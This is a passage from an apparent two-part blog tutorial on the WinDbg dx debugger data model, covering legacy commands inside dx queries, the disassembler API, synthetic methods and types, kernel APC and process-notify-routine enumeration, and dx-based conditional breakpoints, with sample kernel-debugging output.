Object : 0xffffb10b7716d080 [Type: _EPROCESS *]
Name : "winlogon.exe"
PID : 852 [Type: __int64]
...


The first result is the table belonging to the System process and it does not have a QuotaProcess, which is the reason this query returns an error for it. But it should work perfectly for every other entry in the array. If we want to make our output prettier, we can filter out entries where QuotaProcess == 0 before we do the Select():

dx -r2 (Debugger.Utility.Collections.FromListEntry(*(nt!_LIST_ENTRY*)&nt!HandleTableListHead, "nt!_HANDLE_TABLE", "HandleTableList")).Where(h => h.QuotaProcess != 0).Select(h => new { Object = h.QuotaProcess, Name = ((char*)h.QuotaProcess->ImageFileName).ToDisplayString("s"), PID = h.QuotaProcess->UniqueProcessId})

As we already showed before, we can also print this list in a graphic view or use any LINQ queries to make the output match our needs.

This is the end of our first part, but don’t worry, the second part is right here, and it contains all the fancy new dx methods such as a new disassembler, defining our own methods, conditional breakpoints that actually work, and more.

WinDbg — the Fun Way: Part 2


Welcome to part 2 of me trying to make you enjoy debugging on Windows (wow, I’m a nerd)!

In the first part we got to know the basics of the new debugger data model: using the new objects, having custom registers, searching and filtering output, declaring anonymous types and parsing lists and arrays. In this part we will learn how to use legacy commands with dx, get to know the amazing new disassembler, create synthetic methods and types, see the fancy changes to breakpoints and use the filesystem from within the debugger.

This sounds like a lot. Because it is. So let’s start!

Legacy Commands

This new data model completely changes the debugging experience. But sometimes you do need to use one of the old commands or extensions that we all got used to, and that don’t have a matching functionality under dx.

But we can still use these under dx with Debugger.Utility.Control.ExecuteCommand, which lets us run a legacy command as part of a dx query. For example, we can use the legacy u command to unassemble the address that is pointed to by RIP in our second stack frame.

Since dx output is decimal by default and legacy commands only take hex input we first need to convert it to hex using ToDisplayString("x"):

dx Debugger.Utility.Control.ExecuteCommand("u " + @$curstack.Frames[1].Attributes.InstructionOffset.ToDisplayString("x"))
Debugger.Utility.Control.ExecuteCommand("u " + @$curstack.Frames[1].Attributes.InstructionOffset.ToDisplayString("x"))                
[0x0] : kdnic!TXTransmitQueuedSends+0x125:
[0x1] : fffff807`52ad2b61 4883c430 add rsp,30h
[0x2] : fffff807`52ad2b65 5b pop rbx
[0x3] : fffff807`52ad2b66 c3 ret
[0x4] : fffff807`52ad2b67 4c8d4370 lea r8,[rbx+70h]
[0x5] : fffff807`52ad2b6b 488bd7 mov rdx,rdi
[0x6] : fffff807`52ad2b6e 488d4b60 lea rcx,[rbx+60h]
[0x7] : fffff807`52ad2b72 4c8b15d7350000 mov r10,qword ptr [kdnic!_imp_ExInterlockedInsertTailList (fffff807`52ad6150)]
[0x8] : fffff807`52ad2b79 e8123af8fb call nt!ExInterlockedInsertTailList (fffff807`4ea56590)

Another useful legacy command is !irp. This command supplies us with a lot of information about IRPs, so no need to work hard to recreate it with dx.

So we will try to run !irp for all IRPs in the lsass.exe process. Let’s walk through that:

First, we need to find the process container for lsass.exe. We already know how to do that using Where(). Then we’ll pick the first process returned. Usually there should only be one lsass anyway, unless there are server silos on the machine:

dx @$lsass = @$cursession.Processes.Where(p => p.Name == "lsass.exe").First()

Then we need to iterate over the IrpList for each thread in the process and get the IRPs themselves. We can easily do that with FromListEntry(), which we’ve seen already. Then we only pick the threads that have IRPs in their list:

dx -r4 @$irpThreads = @$lsass.Threads.Select(t => new {irp = Debugger.Utility.Collections.FromListEntry(t.KernelObject.IrpList, "nt!_IRP", "ThreadListEntry")}).Where(t => t.irp.Count() != 0)
@$irpThreads = @$lsass.Threads.Select(t => new {irp = 
Debugger.Utility.Collections.FromListEntry(t.KernelObject.IrpList, "nt!_IRP", "ThreadListEntry")}).Where(t => t.irp.Count() != 0)
[0x384]
irp
[0x0] [Type: _IRP]
[<Raw View>] [Type: _IRP]
IoStack : Size = 12, Current IRP_MJ_DIRECTORY_CONTROL / 0x2 for Device for "\FileSystem\Ntfs"
CurrentThread : 0xffffb90a59477080 [Type: _ETHREAD *]
[0x1] [Type: _IRP]
[<Raw View>] [Type: _IRP]
IoStack : Size = 12, Current IRP_MJ_DIRECTORY_CONTROL / 0x2 for Device for "\FileSystem\Ntfs"
CurrentThread : 0xffffb90a59477080 [Type: _ETHREAD *]

We can stop here for a moment, click on IoStack for one of the IRPs (or run with -r5 to see all of them) and get the stack in a nice container we can work with:

dx @$irpThreads.First().irp[0].IoStack
@$irpThreads.First().irp[0].IoStack                 : Size = 12, Current IRP_MJ_DIRECTORY_CONTROL / 0x2 for Device for "\FileSystem\Ntfs"
[0] : IRP_MJ_CREATE / 0x0 for {...} [Type: _IO_STACK_LOCATION]
[1] : IRP_MJ_CREATE / 0x0 for {...} [Type: _IO_STACK_LOCATION]
[2] : IRP_MJ_CREATE / 0x0 for {...} [Type: _IO_STACK_LOCATION]
[3] : IRP_MJ_CREATE / 0x0 for {...} [Type: _IO_STACK_LOCATION]
[4] : IRP_MJ_CREATE / 0x0 for {...} [Type: _IO_STACK_LOCATION]
[5] : IRP_MJ_CREATE / 0x0 for {...} [Type: _IO_STACK_LOCATION]
[6] : IRP_MJ_CREATE / 0x0 for {...} [Type: _IO_STACK_LOCATION]
[7] : IRP_MJ_CREATE / 0x0 for {...} [Type: _IO_STACK_LOCATION]
[8] : IRP_MJ_CREATE / 0x0 for {...} [Type: _IO_STACK_LOCATION]
[9] : IRP_MJ_CREATE / 0x0 for {...} [Type: _IO_STACK_LOCATION]
[10] : IRP_MJ_DIRECTORY_CONTROL / 0x2 for Device for "\FileSystem\Ntfs" [Type: _IO_STACK_LOCATION]
[11] : IRP_MJ_DIRECTORY_CONTROL / 0x2 for Device for "\FileSystem\FltMgr" [Type: _IO_STACK_LOCATION]

And as the final step we will iterate over every thread, and over every IRP in each, and run ExecuteCommand with !irp <irp address>. Here too we need casting and ToDisplayString("x") to match the format expected by legacy commands (the output of !irp is very long so we trimmed it down to focus on the interesting data):

dx -r3 @$irpThreads.Select(t => t.irp.Select(i => Debugger.Utility.Control.ExecuteCommand("!irp " + ((__int64)&i).ToDisplayString("x"))))
@$irpThreads.Select(t => t.irp.Select(i => Debugger.Utility.Control.ExecuteCommand("!irp " + ((__int64)&i).ToDisplayString("x"))))                
[0x384]
[0x0]
[0x0] : Irp is active with 12 stacks 11 is current (= 0xffffb90a5b8f4d40)
[0x1] : No Mdl: No System Buffer: Thread ffffb90a59477080: Irp stack trace.
[0x2] : cmd flg cl Device File Completion-Context
[0x3] : [N/A(0), N/A(0)]
...
[0x34] : Irp Extension present at 0xffffb90a5b8f4dd0:
[0x1]
[0x0] : Irp is active with 12 stacks 11 is current (= 0xffffb90a5bd24840)
[0x1] : No Mdl: No System Buffer: Thread ffffb90a59477080: Irp stack trace.
[0x2] : cmd flg cl Device File Completion-Context
[0x3] : [N/A(0), N/A(0)]
...
[0x34] : Irp Extension present at 0xffffb90a5bd248d0:

Most of the information given to us by !irp we can get by parsing the IRPs with dx and dumping the IoStack for each. But there are a few things that are harder to get that way and that the legacy command hands us for free, such as the existence and address of an IrpExtension and information about a possible Mdl linked to the Irp.

Disassembler

We used the u command as an example, though in this case there actually is functionality implementing this in dx, through Debugger.Utility.Code.CreateDisassembler and DisassembleBlocks, creating iterable and searchable disassembly:

dx -r3 Debugger.Utility.Code.CreateDisassembler().DisassembleBlocks(@$curstack.Frames[1].Attributes.InstructionOffset)
Debugger.Utility.Code.CreateDisassembler().DisassembleBlocks(@$curstack.Frames[1].Attributes.InstructionOffset)                
[0xfffff80752ad2b61] : Basic Block [0xfffff80752ad2b61 - 0xfffff80752ad2b67)
StartAddress : 0xfffff80752ad2b61
EndAddress : 0xfffff80752ad2b67
Instructions
[0xfffff80752ad2b61] : add rsp,30h
[0xfffff80752ad2b65] : pop rbx
[0xfffff80752ad2b66] : ret
[0xfffff80752ad2b67] : Basic Block [0xfffff80752ad2b67 - 0xfffff80752ad2b7e)
StartAddress : 0xfffff80752ad2b67
EndAddress : 0xfffff80752ad2b7e
Instructions
[0xfffff80752ad2b67] : lea r8,[rbx+70h]
[0xfffff80752ad2b6b] : mov rdx,rdi
[0xfffff80752ad2b6e] : lea rcx,[rbx+60h]
[0xfffff80752ad2b72] : mov r10,qword ptr [kdnic!__imp_ExInterlockedInsertTailList (fffff80752ad6150)]
[0xfffff80752ad2b79] : call ntkrnlmp!ExInterlockedInsertTailList (fffff8074ea56590)
[0xfffff80752ad2b7e] : Basic Block [0xfffff80752ad2b7e - 0xfffff80752ad2b80)
StartAddress : 0xfffff80752ad2b7e
EndAddress : 0xfffff80752ad2b80
Instructions
[0xfffff80752ad2b7e] : jmp kdnic!TXTransmitQueuedSends+0xd0 (fffff80752ad2b0c)
[0xfffff80752ad2b80] : Basic Block [0xfffff80752ad2b80 - 0xfffff80752ad2b81)
StartAddress : 0xfffff80752ad2b80
EndAddress : 0xfffff80752ad2b81
Instructions
...

And the cleaned-up version, picking only the instructions and flattening the tree:

dx -r2 Debugger.Utility.Code.CreateDisassembler().DisassembleBlocks(@$curstack.Frames[1].Attributes.InstructionOffset).Select(b => b.Instructions).Flatten()
Debugger.Utility.Code.CreateDisassembler().DisassembleBlocks(@$curstack.Frames[1].Attributes.InstructionOffset).Select(b => b.Instructions).Flatten()                
[0x0]
[0xfffff80752ad2b61] : add rsp,30h
[0xfffff80752ad2b65] : pop rbx
[0xfffff80752ad2b66] : ret
[0x1]
[0xfffff80752ad2b67] : lea r8,[rbx+70h]
[0xfffff80752ad2b6b] : mov rdx,rdi
[0xfffff80752ad2b6e] : lea rcx,[rbx+60h]
[0xfffff80752ad2b72] : mov r10,qword ptr [kdnic!__imp_ExInterlockedInsertTailList (fffff80752ad6150)]
[0xfffff80752ad2b79] : call ntkrnlmp!ExInterlockedInsertTailList (fffff8074ea56590)
[0x2]
[0xfffff80752ad2b7e] : jmp kdnic!TXTransmitQueuedSends+0xd0 (fffff80752ad2b0c)
[0x3]
[0xfffff80752ad2b80] : int 3
[0x4]
[0xfffff80752ad2b81] : int 3
...

Synthetic Methods

Another functionality that we get with this debugger data model is to create functions of our own and use them, with this syntax:

0: kd> dx @$multiplyByThree = (x => x * 3)
@$multiplyByThree = (x => x * 3)
0: kd> dx @$multiplyByThree(5)
@$multiplyByThree(5) : 15

Or we can have functions taking multiple arguments:

0: kd> dx @$add = ((x, y) => x + y)
@$add = ((x, y) => x + y)
0: kd> dx @$add(5, 7)
@$add(5, 7)      : 12

Or if we want to really go a few levels up, we can apply these functions to the disassembly output we saw earlier to find all writes into memory in ZwSetInformationProcess. For that there are a few checks we need to apply to each instruction to know whether or not it’s a write into memory:

· Does it have at least 2 operands?
For example, ret will have zero and jmp <address> will have one. We only care about cases where one value is being written into some location, which will always require two operands. To verify that we will check for each instruction Operands.Count() > 1.

· Is this a memory reference?
We are only interested in writes into memory and want to ignore instructions like mov r10, rcx. To do that, we will check for each instruction its Operands[0].Attributes.IsMemoryReference == true.
We check Operands[0] because that will be the destination. If we wanted to find memory reads we would have checked the source, which is in Operands[1].

· Is the destination operand an output?
We want to filter out instructions where memory is referenced but not written into. To check that we will use Operands[0].IsOutput == true.

· As our last filter we want to ignore memory writes into the stack, which will look like mov [rsp+0x18], 1 or mov [rbp-0x10], rdx.
We will check the register of the first operand and make sure its index is not the rsp index (0x14) or rbp index (0x15).

We will write a function, @$isMemWrite, that receives a block and only returns the instructions that contain a memory write, based on these checks. Then we can create a disassembler, disassemble our target function and only print the memory writes in it:

dx -r0 @$rspId = 0x14
dx -r0 @$rbpId = 0x15
dx -r0 @$isMemWrite = (b => b.Instructions.Where(i => i.Operands.Count() > 1 && i.Operands[0].Attributes.IsOutput && i.Operands[0].Registers[0].Id != @$rspId && i.Operands[0].Registers[0].Id != @$rbpId && i.Operands[0].Attributes.IsMemoryReference))
dx -r0 @$findMemWrite = (a => Debugger.Utility.Code.CreateDisassembler().DisassembleBlocks(a).Select(b => @$isMemWrite(b)))
dx -r2 @$findMemWrite(&nt!ZwSetInformationProcess).Where(b => b.Count() != 0)
@$findMemWrite(&nt!ZwSetInformationProcess).Where(b => b.Count() != 0)                
[0xfffff8074ebd23d4]
[0xfffff8074ebd23e9] : mov qword ptr [r10+80h],rax
[0xfffff8074ebd23f5] : mov qword ptr [r10+44h],rax
[0xfffff8074ebd2415]
[0xfffff8074ebd2421] : mov qword ptr [r10+98h],r8
[0xfffff8074ebd2428] : mov qword ptr [r10+0F8h],r9
[0xfffff8074ebd2433] : mov byte ptr gs:[5D18h],al
[0xfffff8074ebd25b2]
[0xfffff8074ebd25c3] : mov qword ptr [rcx],rax
[0xfffff8074ebd25c9] : mov qword ptr [rcx+8],rax
[0xfffff8074ebd25d0] : mov qword ptr [rcx+10h],rax
[0xfffff8074ebd25d7] : mov qword ptr [rcx+18h],rax
[0xfffff8074ebd25df] : mov qword ptr [rcx+0A0h],rax
[0xfffff8074ebd263f]
[0xfffff8074ebd264f] : and byte ptr [rax+5],0FDh
[0xfffff8074ebd26da]
[0xfffff8074ebd26e3] : mov qword ptr [rcx],rax
[0xfffff8074ebd26e9] : mov qword ptr [rcx+8],rax
[0xfffff8074ebd26f0] : mov qword ptr [rcx+10h],rax
[0xfffff8074ebd26f7] : mov qword ptr [rcx+18h],rax
[0xfffff8074ebd26ff] : mov qword ptr [rcx+0A0h],rax
[0xfffff8074ebd2708] : mov word ptr [rcx+72h],ax
...

As another project combining almost everything mentioned here, we can try to create a version of !apc using dx. To simplify we will only look for kernel APCs. To do that, we have a few steps:

  • Iterate over all the processes using @$cursession.Processes to find the ones containing threads where KTHREAD.ApcState.KernelApcPending is set to 1.
  • Make a container in the process with only the threads that have pending kernel APCs. Ignore the rest.
  • For each of these threads, iterate over KTHREAD.ApcState.ApcListHead[0] (contains the kernel APCs) and gather interesting information about them. We can do that with the FromListEntry() method we’ve seen earlier.
    To make our container as similar as possible to !apc, we will only get KernelRoutine and RundownRoutine, though in your implementation you might find there are other fields that interest you as well.
  • To make the container easier to navigate, collect process name, ID and EPROCESS address, and thread ID and ETHREAD address.
  • In our implementation we wrote a few helper functions:
    @$printLn — runs the legacy command ln with the supplied address, to get information about the symbol
    @$extractBetween — extract a string between two other strings, will be used for getting a substring from the output of @$printLn
    @$printSymbol — Sends an address to @$printLn and extracts the symbol name only, using @$extractBetween
    @$apcsForThread — Finds all kernel APCs for a thread and creates a container with their KernelRoutine and RundownRoutine.

We then got all the processes that have threads with pending kernel APCs and saved them into the @$procWithKernelApc register, and then in a separate command got the APC information using @$apcsForThread. We also cast the EPROCESS and ETHREAD pointers to void* so dx doesn’t print the whole structure when we print the final result.

This was our way of solving this problem, but there can be others, and yours doesn’t have to be identical to ours!

The script we came up with is:

dx -r0 @$printLn = (a => Debugger.Utility.Control.ExecuteCommand("ln " + ((__int64)a).ToDisplayString("x")))
dx -r0 @$extractBetween = ((x,y,z) => x.Substring(x.IndexOf(y) + y.Length, x.IndexOf(z) - x.IndexOf(y) - y.Length))
dx -r0 @$printSymbol = (a => @$extractBetween(@$printLn(a)[3], " ", "|"))
dx -r0 @$apcsForThread = (t => new {TID = t.Id, Object = (void*)&t.KernelObject, Apcs = Debugger.Utility.Collections.FromListEntry(*(nt!_LIST_ENTRY*)&t.KernelObject.Tcb.ApcState.ApcListHead[0], "nt!_KAPC", "ApcListEntry").Select(a => new { Kernel = @$printSymbol(a.KernelRoutine), Rundown = @$printSymbol(a.RundownRoutine)})})
dx -r0 @$procWithKernelApc = @$cursession.Processes.Select(p => new {Name = p.Name, PID = p.Id, Object = (void*)&p.KernelObject, ApcThreads = p.Threads.Where(t => t.KernelObject.Tcb.ApcState.KernelApcPending != 0)}).Where(p => p.ApcThreads.Count() != 0)
dx -r6 @$procWithKernelApc.Select(p => new { Name = p.Name, PID = p.PID, Object = p.Object, ApcThreads = p.ApcThreads.Select(t => @$apcsForThread(t))})

And it produces the following output:

dx -r6 @$procWithKernelApc.Select(p => new { Name = p.Name, PID = p.PID, Object = p.Object, ApcThreads = p.ApcThreads.Select(t => @$apcsForThread(t))})
@$procWithKernelApc.Select(p => new { Name = p.Name, PID = p.PID, Object = p.Object, ApcThreads = p.ApcThreads.Select(t => @$apcsForThread(t))})                
[0x15b8]
Name : SearchUI.exe
Length : 0xc
PID : 0x15b8
Object : 0xffffb90a5b1300c0 [Type: void *]
ApcThreads
[0x159c]
TID : 0x159c
Object : 0xffffb90a5b14f080 [Type: void *]
Apcs
[0x0]
Kernel : nt!EmpCheckErrataList
Rundown : nt!EmpCheckErrataList
[0x1528]
TID : 0x1528
Object : 0xffffb90a5aa6b080 [Type: void *]
Apcs
[0x0]
Kernel : nt!EmpCheckErrataList
Rundown : nt!EmpCheckErrataList
[0x16b4]
TID : 0x16b4
Object : 0xffffb90a59f1e080 [Type: void *]
Apcs
[0x0]
Kernel : nt!EmpCheckErrataList
Rundown : nt!EmpCheckErrataList
[0x16a0]
TID : 0x16a0
Object : 0xffffb90a5b141080 [Type: void *]
Apcs
[0x0]
Kernel : nt!EmpCheckErrataList
Rundown : nt!EmpCheckErrataList
[0x16b8]
TID : 0x16b8
Object : 0xffffb90a5aab20c0 [Type: void *]
Apcs
[0x0]
Kernel : nt!EmpCheckErrataList
Rundown : nt!EmpCheckErrataList
[0x1740]
TID : 0x1740
Object : 0xffffb90a5ab362c0 [Type: void *]
Apcs
[0x0]
Kernel : nt!EmpCheckErrataList
Rundown : nt!EmpCheckErrataList
[0x1780]
TID : 0x1780
Object : 0xffffb90a5b468080 [Type: void *]
Apcs
[0x0]
Kernel : nt!EmpCheckErrataList
Rundown : nt!EmpCheckErrataList
[0x1778]
TID : 0x1778
Object : 0xffffb90a5b6f7080 [Type: void *]
Apcs
[0x0]
Kernel : nt!EmpCheckErrataList
Rundown : nt!EmpCheckErrataList
[0x17d0]
TID : 0x17d0
Object : 0xffffb90a5b1e8080 [Type: void *]
Apcs
[0x0]
Kernel : nt!EmpCheckErrataList
Rundown : nt!EmpCheckErrataList
[0x17d4]
TID : 0x17d4
Object : 0xffffb90a5b32f080 [Type: void *]
Apcs
[0x0]
Kernel : nt!EmpCheckErrataList
Rundown : nt!EmpCheckErrataList
[0x17f8]
TID : 0x17f8
Object : 0xffffb90a5b32e080 [Type: void *]
Apcs
[0x0]
Kernel : nt!EmpCheckErrataList
Rundown : nt!EmpCheckErrataList
[0xb28]
TID : 0xb28
Object : 0xffffb90a5b065600 [Type: void *]
Apcs
[0x0]
Kernel : nt!EmpCheckErrataList
Rundown : nt!EmpCheckErrataList
[0x1850]
TID : 0x1850
Object : 0xffffb90a5b6a5080 [Type: void *]
Apcs
[0x0]
Kernel : nt!EmpCheckErrataList
Rundown : nt!EmpCheckErrataList

Not as pretty as !apc, but still pretty

We can also print it as a table, receive information about the processes and be able to explore the APCs of each process separately:

dx -g @$procWithKernelApc.Select(p => new { Name = p.Name, PID = p.PID, Object = p.Object, ApcThreads = p.ApcThreads.Select(t => @$apcsForThread(t))})

But wait, what are all these APCs with nt!EmpCheckErrataList? And why does SearchUI.exe have all of them? What does this process have to do with erratas?

The secret is that these APCs are not actually meant to call nt!EmpCheckErrataList. And no, the symbols are not wrong.

The thing we see here is happening because the compiler is being smart: when it sees a few different functions that have the same code, it makes them all point to the same piece of code, instead of duplicating this code multiple times. You might think that this is not a thing that would happen very often, but let’s look at the disassembly for nt!EmpCheckErrataList (the old way this time):

u EmpCheckErrataList
nt!EmpCheckErrataList:
fffff807`4eb86010 c20000 ret 0
fffff807`4eb86013 cc int 3
fffff807`4eb86014 cc int 3
fffff807`4eb86015 cc int 3
fffff807`4eb86016 cc int 3

This is actually just a stub. It might be a function that has not been implemented yet (probably the case for this one) or a function that is meant to be a stub for a good reason. The function that is the real KernelRoutine/RundownRoutine of these APCs is nt!KiSchedulerApcNop, and is meant to be a stub on purpose, and has been for many years. And we can see it has the same code and points to the same address:

u nt!KiSchedulerApcNop
nt!EmpCheckErrataList:
fffff807`4eb86010 c20000 ret 0
fffff807`4eb86013 cc int 3
fffff807`4eb86014 cc int 3
fffff807`4eb86015 cc int 3
fffff807`4eb86016 cc int 3

So why do we see so many of these APCs?

When a thread is being suspended, the system creates a semaphore and queues an APC to the thread that will wait on that semaphore. The thread will be waiting until someone asks to resume it, and then the system will free the semaphore and the thread will stop waiting and resume. The APC itself doesn’t need to do much, but it must have a KernelRoutine and a RundownRoutine, so the system places a stub there. In the symbols this stub receives the name of one of the functions that have this “code”, this time nt!EmpCheckErrataList, but it can be a different one in the next version.

Anyone interested in the suspension mechanism can look at ReactOS. The code for these functions changed a bit since, and the stub function was renamed from KiSuspendNop to KiSchedulerApcNop, but the general design stayed similar.

But I got distracted, this is not what this blog was supposed to be talking about. Let’s get back to WinDbg and synthetic functions:

Synthetic Types

After covering synthetic methods, we can also add our own named types and use them to parse data where the type is not available to us.

For example, let’s try to print the PspCreateProcessNotifyRoutine array, which holds all the registered process notify routines: functions that are registered by drivers and will receive a notification whenever a process starts. But this array doesn’t contain pointers to the registered routines. Instead it contains pointers to the non-documented EX_CALLBACK_ROUTINE_BLOCK structure.

So to parse this array, we need to make sure WinDbg knows this type — to do that we use Synthetic Types. We start by creating a header file containing all the types we want to define (I used c:\temp\header.h). In this case it’s just EX_CALLBACK_ROUTINE_BLOCK, that we can find in ReactOS:

typedef struct _EX_CALLBACK_ROUTINE_BLOCK
{
    _EX_RUNDOWN_REF RundownProtect;
    void* Function;
    void* Context;
} EX_CALLBACK_ROUTINE_BLOCK, *PEX_CALLBACK_ROUTINE_BLOCK;

Now we can ask WinDbg to load it and add the types to the nt module:

dx Debugger.Utility.Analysis.SyntheticTypes.ReadHeader("c:\\temp\\header.h", "nt")
Debugger.Utility.Analysis.SyntheticTypes.ReadHeader("c:\\temp\\header.h", "nt")                 : ntkrnlmp.exe(header.h)
ReturnEnumsAsObjects : false
RegisterSyntheticTypeModels : false
Module : ntkrnlmp.exe
Header : header.h
Types

This gives us an object which lets us see all the types added to this module.
Now that we defined the type, we can use it with CreateInstance:

dx Debugger.Utility.Analysis.SyntheticTypes.CreateInstance("_EX_CALLBACK_ROUTINE_BLOCK", *(__int64*)&nt!PspCreateProcessNotifyRoutine)
Debugger.Utility.Analysis.SyntheticTypes.CreateInstance("_EX_CALLBACK_ROUTINE_BLOCK", *(__int64*)&nt!PspCreateProcessNotifyRoutine)                
RundownProtect [Type: _EX_RUNDOWN_REF]
Function : 0xfffff8074cbdff50 [Type: void *]
Context : 0x6e496c4102031400 [Type: void *]

It’s important to notice that CreateInstance only takes __int64 inputs so any other type has to be cast. It’s good to know this in advance because the error messages these modules return are not always easy to understand.

Now, if we look at our output, and specifically at Context, something seems weird. And actually if we try to dump Function we will see it doesn’t point to any code:

dq 0xfffff8074cbdff50
fffff807`4cbdff50 ????????`???????? ????????`????????
fffff807`4cbdff60 ????????`???????? ????????`????????
fffff807`4cbdff70 ????????`???????? ????????`????????
fffff807`4cbdff80 ????????`???????? ????????`????????
fffff807`4cbdff90 ????????`???????? ????????`????????

So what happened?
The problem is not our cast to EX_CALLBACK_ROUTINE_BLOCK, but the address we are casting. If we dump the values in PspCreateProcessNotifyRoutine we might see what the problem is:

dx ((void**[0x40])&nt!PspCreateProcessNotifyRoutine).Where(a => a != 0)
((void**[0x40])&nt!PspCreateProcessNotifyRoutine).Where(a => a != 0)                
[0] : 0xffffb90a530504ef [Type: void * *]
[1] : 0xffffb90a532a512f [Type: void * *]
[2] : 0xffffb90a53da9d5f [Type: void * *]
[3] : 0xffffb90a53da9ccf [Type: void * *]
[4] : 0xffffb90a53e5d15f [Type: void * *]
[5] : 0xffffb90a571469ef [Type: void * *]
[6] : 0xffffb90a5714722f [Type: void * *]
[7] : 0xffffb90a571473df [Type: void * *]
[8] : 0xffffb90a597d989f [Type: void * *]

The lower half-byte in all of these is 0xF, while we know that pointers in x64 machines are always aligned to 8 bytes, and usually to 0x10. This is because I oversimplified it earlier — these are not pointers to EX_CALLBACK_ROUTINE_BLOCK, they are actually EX_CALLBACK structures (another type that is not in the public pdb), containing an EX_RUNDOWN_REF. But to make this example simpler we will treat them as simple pointers that have been ORed with 0xF, since this is good enough for our purposes. If you ever choose to write a driver that will handle PspCreateProcessNotifyRoutine please do not use this hack, look into ReactOS and do things properly. 😊
So to fix our command we just need to align the addresses to 0x10 before casting them. To do that we do:

<address> & 0xFFFFFFFFFFFFFFF0

Or the nicer version:

<address> & ~0xF

Let’s use that in our command:

dx Debugger.Utility.Analysis.SyntheticTypes.CreateInstance("_EX_CALLBACK_ROUTINE_BLOCK", (*(__int64*)&nt!PspCreateProcessNotifyRoutine) & ~0xf)
Debugger.Utility.Analysis.SyntheticTypes.CreateInstance("_EX_CALLBACK_ROUTINE_BLOCK", (*(__int64*)&nt!PspCreateProcessNotifyRoutine) & ~0xf)                
RundownProtect [Type: _EX_RUNDOWN_REF]
Function : 0xfffff8074ea7f310 [Type: void *]
Context : 0x0 [Type: void *]

This looks better. Let’s check that Function actually points to a function this time:

ln 0xfffff8074ea7f310
Browse module
Set bu breakpoint
(fffff807`4ea7f310)   nt!ViCreateProcessCallback   |  (fffff807`4ea7f330)   nt!RtlStringCbLengthW
Exact matches:
nt!ViCreateProcessCallback (void)

Looks much better! Now we can define this cast as a synthetic method and get the function addresses for all routines in the array:

dx -r0 @$getCallbackRoutine = (a => Debugger.Utility.Analysis.SyntheticTypes.CreateInstance("_EX_CALLBACK_ROUTINE_BLOCK", (__int64)(a & ~0xf)))
dx ((void**[0x40])&nt!PspCreateProcessNotifyRoutine).Where(a => a != 0).Select(a => @$getCallbackRoutine(a).Function)
((void**[0x40])&nt!PspCreateProcessNotifyRoutine).Where(a => a != 0).Select(a => @$getCallbackRoutine(a).Function)                
[0] : 0xfffff8074ea7f310 [Type: void *]
[1] : 0xfffff8074ff97220 [Type: void *]
[2] : 0xfffff80750a41330 [Type: void *]
[3] : 0xfffff8074f8ab420 [Type: void *]
[4] : 0xfffff8075106d9f0 [Type: void *]
[5] : 0xfffff807516dd930 [Type: void *]
[6] : 0xfffff8074ff252c0 [Type: void *]
[7] : 0xfffff807520b6aa0 [Type: void *]
[8] : 0xfffff80753a63cf0 [Type: void *]

But this would be more fun if we could see the symbols instead of the addresses. We already know how to get the symbols by executing the legacy command ln, but this time we will do it with .printf. First we will write a helper function, @$getsym, which will run the command .printf "%y", <address>:

dx -r0 @$getsym = (x => Debugger.Utility.Control.ExecuteCommand(".printf\"%y\", " + ((__int64)x).ToDisplayString("x"))[0])

Then we will send every function address to this method, to print the symbol:

dx ((void**[0x40])&nt!PspCreateProcessNotifyRoutine).Where(a => a != 0).Select(a => @$getsym(@$getCallbackRoutine(a).Function))
((void**[0x40])&nt!PspCreateProcessNotifyRoutine).Where(a => a != 0).Select(a => @$getsym(@$getCallbackRoutine(a).Function))                
[0] : nt!ViCreateProcessCallback (fffff807`4ea7f310)
[1] : cng!CngCreateProcessNotifyRoutine (fffff807`4ff97220)
[2] : WdFilter!MpCreateProcessNotifyRoutineEx (fffff807`50a41330)
[3] : ksecdd!KsecCreateProcessNotifyRoutine (fffff807`4f8ab420)
[4] : tcpip!CreateProcessNotifyRoutineEx (fffff807`5106d9f0)
[5] : iorate!IoRateProcessCreateNotify (fffff807`516dd930)
[6] : CI!I_PEProcessNotify (fffff807`4ff252c0)
[7] : dxgkrnl!DxgkProcessNotify (fffff807`520b6aa0)
[8] : peauth+0x43cf0 (fffff807`53a63cf0)

There, much nicer!

Breakpoints

Conditional Breakpoint

Conditional breakpoints are a huge pain-point when debugging. And with the old MASM syntax they’re almost impossible to use. I spent hours trying to get them to work the way I wanted to, but the command turns out to be so awful that I can’t even understand what I was trying to do, not to mention why it doesn’t filter anything or how to fix it.

Well, these days are over. We can now use dx queries for conditional breakpoints with the following syntax: bp /w "dx query" <address>.

For example, let’s say we are trying to debug an issue involving process opens coming from Wow64 processes. The function NtOpenProcess is called all the time, but we only care about calls done by Wow64 processes, which are not the majority of processes on modern systems. So to avoid helplessly going through 100 debugger breaks until we get lucky, or struggling with MASM-style conditional breakpoints, we can do this instead:

bp /w "@$curprocess.KernelObject.WoW64Process != 0" nt!NtOpenProcess

We then let the machine run, and when the breakpoint is hit we can check if it worked:

Breakpoint 3 hit
nt!NtOpenProcess:
fffff807`2e96b7e0 4883ec38 sub rsp,38h
dx @$curprocess.KernelObject.WoW64Process
@$curprocess.KernelObject.WoW64Process                 : 0xffffc10f5163b390 [Type: _EWOW64PROCESS *]
[+0x000] Peb : 0xf88000 [Type: void *]
[+0x008] Machine : 0x14c [Type: unsigned short]
[+0x00c] NtdllType : PsWowX86SystemDll (1) [Type: _SYSTEM_DLL_TYPE]
dx @$curprocess.Name
@$curprocess.Name : IpOverUsbSvc.exe
Length : 0x10

The process that triggered our breakpoint is a WoW64 process!
For anyone who has ever tried using conditional breakpoints with MASM, this is a life-changing addition.

Other Breakpoint Options

There are a few other interesting breakpoint options found under Debugger.Utility.Control:

  • SetBreakpointAtSourceLocation — allowing us to set a breakpoint in a module whose source file is available to us, with this syntax: dx Debugger.Utility.Control.SetBreakpointAtSourceLocation("MyModule!myFile.cpp", "172")
  • SetBreakpointAtOffset — sets a breakpoint at an offset inside a function — dx Debugger.Utility.Control.SetBreakpointAtOffset("NtOpenFile", 8, "nt")
  • SetBreakpointForReadWrite — similar to the legacy ba command but with more readable syntax, this lets us set a breakpoint to issue a debug break whenever anyone reads or writes to an address. Its default configuration is type = Hardware Write and size = 1.
    For example, let's try to break on every read of Ci!g_CiOptions, a variable whose size is 4 bytes:
dx Debugger.Utility.Control.SetBreakpointForReadWrite(&Ci!g_CiOptions, "Hardware Read", 0x4)

We let the machine keep running and almost immediately our breakpoint is hit:

0: kd> g
Breakpoint 0 hit
CI!CiValidateImageHeader+0x51b:
fffff807`2f6fcb1b 740c je CI!CiValidateImageHeader+0x529 (fffff807`2f6fcb29)

